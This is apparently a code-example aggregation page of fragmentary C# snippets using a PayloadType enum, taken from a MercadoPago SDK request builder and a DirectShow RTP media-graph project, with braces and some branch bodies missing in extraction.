            if (httpMethod.Equals(HttpMethod.GET))
                if (payload != null)
                    throw new MPRESTException("Payload not supported for this method.");
            else if (httpMethod.Equals(HttpMethod.POST))
                //if (payload == null)
                //    throw new MPRESTException("Must include payload for this method.");
            else if (httpMethod.Equals(HttpMethod.PUT))
                if (payload == null)
                    throw new MPRESTException("Must include payload for this method.");
            else if (httpMethod.Equals(HttpMethod.DELETE))
                if (payload != null)
                    throw new MPRESTException("Payload not supported for this method.");

            MPRequest mpRequest = new MPRequest();
            mpRequest.Request = (HttpWebRequest)HttpWebRequest.Create(path);
            mpRequest.Request.Method = httpMethod.ToString();

            if (requestOptions == null)
                requestOptions = new MPRequestOptions();

            if (requestOptions.Timeout > 0)
                mpRequest.Request.Timeout = requestOptions.Timeout;

            mpRequest.Request.Headers.Add("x-product-id", SDK.ProductId);
            mpRequest.Request.Headers.Add("x-tracking-id", SDK.TrackingId);

            if (requestOptions.CustomHeaders != null)
                foreach (var header in requestOptions.CustomHeaders)
                    if (mpRequest.Request.Headers[header.Key] == null)
                        mpRequest.Request.Headers.Add(header.Key, header.Value);

            if (requestOptions.TrackHeaders != null)
                foreach (var trackHeader in requestOptions.TrackHeaders)
                    if (mpRequest.Request.Headers[trackHeader.Key] == null && trackHeader.Value != null)
                        mpRequest.Request.Headers[trackHeader.Key] = trackHeader.Value;

            if (payload != null) // POST & PUT
                byte[] data = null;
                if (payloadType != PayloadType.JSON)
                    var parametersDict = payload.ToObject<Dictionary<string, string>>();
                    StringBuilder parametersString = new StringBuilder();
                    parametersString.Append(string.Format("{0}={1}", parametersDict.First().Key, parametersDict.First().Value));
                    foreach (var value in parametersDict)
                        parametersString.Append(string.Format("&{0}={1}", value.Key, value.Value.ToString()));

                    data = Encoding.UTF8.GetBytes(parametersString.ToString());
                    data = Encoding.UTF8.GetBytes(payload.ToString());

                mpRequest.Request.UserAgent = "MercadoPago DotNet SDK/" + SDK.Version;
                mpRequest.Request.ContentLength = data.Length;
                mpRequest.Request.ContentType = payloadType == PayloadType.JSON ? "application/json" : "application/x-www-form-urlencoded";
                mpRequest.RequestPayload = data;

            IWebProxy proxy = requestOptions.Proxy != null ? requestOptions.Proxy : (_proxy != null ? _proxy : SDK.Proxy);
            mpRequest.Request.Proxy = proxy;

            return mpRequest;
Exemplo n.º 57
 /// <summary>
 /// Remove the renderer for the branch of the graph corresponding to the specified payload
 /// </summary>
 /// <param name="payload"></param>
 public override void RemoveRenderer(PayloadType payload)
     if (dvSplitter != null) {
         if (payload == PayloadType.dynamicAudio) {
             if (audioCompressor == null) {
             else {
         else if (payload == PayloadType.dynamicVideo) {
             if (videoCompressor == null) {
             else {
Exemplo n.º 58
        /// <summary>
        /// Build a graph with sampleGrabber.  Render it, and get the media type.
        /// </summary>
        /// <param name="payload"></param>
        /// <returns></returns>
        public bool Build(PayloadType payload, RtpStream newStream)
            this.stream = newStream;
            this.ssrc   = newStream.SSRC;

            //Required as of RC3:
            this.stream.IsUsingNextFrame = true;

            if ((ssrc == 0) || !((payload == PayloadType.dynamicVideo) || (payload == PayloadType.dynamicAudio)))
                errorMsg = "Invalid inputs to build method.";

            fgm = new FilgraphManagerClass();

            MSR.LST.MDShow.IBaseFilter bfSource = null;
            IGraphBuilder iGB = (IGraphBuilder)fgm;

            //if (false)
            //	rotnum = FilterGraph.AddToRot(iGB); //AddToRot(iGB);

                bfSource = RtpSourceClass.CreateInstance();
                iGB.AddFilter(bfSource, "RtpSource");
                MSR.LST.MDShow.IPin sourceOutput = Filter.GetPin(bfSource, _PinDirection.PINDIR_OUTPUT, Guid.Empty,
                                                                 Guid.Empty, false, 0);

                //Add SampleGrabber filter
                MSR.LST.MDShow.IBaseFilter bfGrabber = SampleGrabberClass.CreateInstance();
                iGB.AddFilter(bfGrabber, "Grabber");
                UW.CSE.MDShow.ISampleGrabber sgGrabber = (UW.CSE.MDShow.ISampleGrabber)bfGrabber;

                //Set mediatype
                UW.CSE.MDShow._AMMediaType mt = new UW.CSE.MDShow._AMMediaType();
                if (payload == PayloadType.dynamicVideo)
                    mt.majortype = MediaType.MajorType.MEDIATYPE_Video;
                    //PRI2: RGB24 seems to work for all video?  We have used YUY2 in the past, but that won't work
                    // for screen streaming.  Probably could use more testing
                    //mt.subtype = MediaType.SubType.MEDIASUBTYPE_YUY2;
                    mt.subtype = MediaType.SubType.MEDIASUBTYPE_RGB24;
                    mt.majortype = MediaType.MajorType.MEDIATYPE_Audio;
                    mt.subtype   = MediaType.SubType.MEDIASUBTYPE_PCM;                   //MEDIASUBTYPE_PCM;

                sgGrabber.SetMediaType(ref mt);

                //Add samplegrabber callback
                //0 is sampleCB, 1 is bufferCB.  Only bufferCB is actually returning data so far.
                sgGrabber.SetCallback(callBack, 1);


                UW.CSE.MDShow._AMMediaType uwmt = new UW.CSE.MDShow._AMMediaType();
                sgGrabber.GetConnectedMediaType(ref uwmt);
                connectedMT = copy_AMMediaType(uwmt);
            catch (Exception e)
                errorMsg = e.Message;
                Debug.WriteLine("Exception while building graph: " + e.ToString());
                eventLog.WriteEntry("Exception while building graph: " + e.ToString(), EventLogEntryType.Error, 1001);
Exemplo n.º 59
 /// <summary>
 /// Remove the specified branch from the splitter.
 /// </summary>
 /// <param name="payload"></param>
 private void RemoveFiltersDownstreamFromSplitter(PayloadType payload)
     if (dvSplitter != null) {
         if (payload == PayloadType.dynamicAudio) {
             audioCompressor = null;
         else if (payload == PayloadType.dynamicVideo) {
             videoCompressor = null;
Exemplo n.º 60
 public virtual void RemoveRenderer(PayloadType payload)